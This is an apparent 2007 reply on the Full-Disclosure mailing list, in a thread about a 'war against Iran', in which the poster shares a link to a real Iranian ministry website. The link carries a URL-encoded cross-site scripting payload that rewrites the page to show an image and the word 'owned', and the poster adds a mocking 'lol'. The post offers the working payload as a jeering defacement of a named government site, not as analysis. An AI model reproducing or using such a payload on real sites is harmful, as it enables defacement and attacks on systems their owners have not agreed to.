
Date: Sun, 15 Apr 2007 15:39:42 +0100
From: jonnyboi <jonnyboi@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: War against Iran: Update from front lines

Looks like the front line have made their first strike.

http://www.mod.ir/user.asp?T1=%3Cscript%3Edocument.all%5B5%5D.innerHTML='%3Cp%20align=center%3E%3Cimg%20src=/images/arm.jpg%3E%3Cbr%3Eowned.';%3C/script%3E

lol.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
